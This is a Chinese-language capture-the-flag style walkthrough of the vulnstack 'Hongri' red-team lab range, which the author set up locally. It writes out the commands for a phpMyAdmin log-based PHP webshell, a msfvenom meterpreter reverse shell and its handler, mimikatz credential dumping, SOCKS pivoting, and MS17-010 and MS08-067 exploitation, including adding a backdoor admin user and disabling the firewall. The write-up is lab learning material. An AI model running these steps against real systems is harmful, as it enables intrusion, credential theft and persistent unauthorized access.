ATT&CK实战系统-红队实战（一）

很久之前放到收藏夹里的红日靶机，之前总想着汇总一下打一打，但是硬盘没有太大空间就没有去下载搭建（其实就是懒），最近写毕设的过程中无聊换换脑子来打一打。

靶场下载地址

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

靶机配置

靶机有三台。

Win7：内 192.168.52.143 外 192.168.31.245

Win Server 08：192.168.52.138

Win Server 03：192.168.52.141

本机Mac（攻击机）：192.168.31.222

三台机器密码都是 hongrisec@2019

Win Server 08登陆以后强制要求修改密码

密码更改为 qwertyuiop123.

在win7上测试一下，能ping通Mac和Windows2003、Windows Server 2008

Mac无法ping通win7，因为win7开了防火墙，更无法ping通内网中的2003和2008；

开启win7的phpstudy，我们开始外网渗透。

外网渗透

nmap扫一下看看 win7开放了哪些端口。

直接访问80 发现是phpstudy探针

暴露了网站的绝对路径为C:/phpStudy/WWW

dirsearch扫描网站目录看看，这里用我自己扫描器试试。

扫到了phpmyadmin。

phpmyadmin是可以getshell的

phpmyadmin写shell

访问phpmyadmin 弱口令 root root登录之。

通过开启日志写shell，这里简单说一下。

show variables like 'general%';

set global general_log = "ON"; 
set global general_log_file='C:/phpStudy/WWW/shell.php';

SELECT '<?php eval($_POST["cmd"]);?>'

一句话写进去以后蚁剑链接看看

因为是phpstudy是Administrator。

可见是双网卡，还有一个内网网卡为

并且还有域存在。

反弹shell

接下来为了后续内网，准备上线到msf上。生成一个.exe上传到服务器并执行。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.222 LPORT=4444 -f exe -o msf.exe

本机Mac进行监听

使用exploit/multi/handler模块开启msf监听；

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.31.222
set lport 4444
run

getuid查看当前会话权限

getsystem自动尝试提权

未开放3389端口

执行run post/windows/manage/enable_rdp开启3389端口

开启以后可连接。

密码抓取

首先msf加载mimikatz

load mimikatz

creds_msv    获取密码hash值
creds_kerberos    获取密码明文

成功抓取到了登陆密码。

内网渗透

Arp -a查看路由表

可见网段192.168.52.0/24，还有另外两台主机；

run autoroute -s 192.168.52.0/24添加录路由； run autoroute -p查看路由；

设置代理方便访问内网服务。

search socks
use auxiliary/server/socks_proxy
set srvhost 192.168.31.222
set srvport 1088
run

然后修改vim /usr/local/etc/proxychains.conf的最后一行为socks5 192.168.31.222 1088

测试一下能否顺利访问内网主机

接下来我们就扫一下另外两台主机

192.168.52.138

192.168.52.141

都开启了哪些端口

使用msf自带的 portscan

auxiliary/scanner/portscan/tcp模块；

use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.141
set threads 100
run

速度感觉。。有点慢

445和135端口，说明都有SMB服务

使用auxiliary/scanner/smb/smb_version扫描系统版本进行验证

判断系统版本为03

看到445难免想到经典的17010，来验证一下。

MS17-010

use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.52.141
run

失败了。百度了一下可以换一个这个模块试试看

auxiliary/admin/smb/ms17_010_command模块执行命令；

use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.141
set command whoami
run

发现此模块可行。

那就利用此模块我们添加一个管理员组的用户。并开启3389端口

set command net user pocsec zxcvbnm123. /add添加用户；
set command net localgroup administrators pocsec /add添加管理员权限；
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'执行命令开启3389端口，这里要么用单引号把命令引住，要么用反斜杠对反斜杠和引号进行转义，否则会出错；

添加了无数次本机查看都没有成功，后来发现某大佬写的文章原来是

是因为有密码设置策略，密码不能太简单且不能包含用户名。

密码复杂一点就好了

或者直接exploit/windows/smb/ms17_010_psexec反弹一个shell过来。

MS08-067

我们用08067去打一下试试看

use exploit/windows/smb/ms08_067_netapi 
set rhosts 192.168.52.141
# 设置payload
set payload generic/shell_bind_tcp
# 设置自动类型
set target 0
run

至此这台03也被我们拿下。

接下来那台08 也是存在17010，来试试看

接下来和拿2003主机一样的操作，依然可以用auxiliary/admin/smb/ms17_010_command模块执行命令； 因为开启了防火墙，我们先执行命令set command netsh firewall set opmode mode=disable关闭防火墙；

然后我们用这个模块exploit/windows/smb/ms17_010_psexec反弹一个shell过来

注意直接反弹不能成功，先用ms17_010_command执行关闭防火墙命令，在反弹则成功。

可见三台机器都已经被我们拿到了。

到此结束。

总结

nmap探测端口，获取80端口，dirsearch扫目录发现phpstudy探测界面和phpmyadmin。

弱口令进入phpmyadmin 经典的phpmyadmin日志写webshell。最后上线到msf提权。

后添加路由，查看路由表发现其他两台机器，内网用nmap（这里我上面吗没演示）实际上用nmap验证了一下，发现两台机器存在17010和08067最后使用这两个漏洞打下来这两台主机。

其实自己做的过程中没有用到域渗透的东西，等后续其他靶场多换换姿势学一下。